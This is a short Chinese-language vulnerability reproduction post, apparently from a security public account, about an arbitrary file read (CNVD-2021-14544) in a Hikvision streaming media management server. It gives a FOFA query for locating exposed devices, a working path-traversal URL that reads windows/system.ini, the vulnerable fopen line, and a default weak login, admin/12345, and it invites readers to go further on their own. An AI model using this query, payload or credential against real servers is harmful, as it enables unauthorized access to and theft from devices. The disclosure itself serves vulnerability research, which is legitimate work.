HIKVISION 流媒体管理服务器后台任意文件读取漏洞（CNVD-2021-14544）复现

1. 影响版本

据不可靠消息：<=V4.3.0

2.使用fofa搜索：

title="流媒体管理服务器"

3.POC

/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

4.测试发现：

fileName未输入文件名时，返回包会报错，错误信息中包含网站的部分绝对路径信息，经过路径构造可以获取当前php文件的内容：

可以看到，源代码是想把读取的文件写死在log这个目录下，而以下这段代码还是造成了目录穿越！

$file = fopen($file_dir . $file_name,"r"); // 打开文件

剩下的大家自觉发挥吧（切勿非法渗透！）

5.结尾彩蛋：

该产品存在弱口令登录：admin/12345

申明：所有渗透行为都需获取授权！本公众号所分享的内容仅作为技术讨论，禁止用于一切违法行为，违法行为所造成的一切不良后果与文章作者和本公众号无关！未经授权，严禁转载!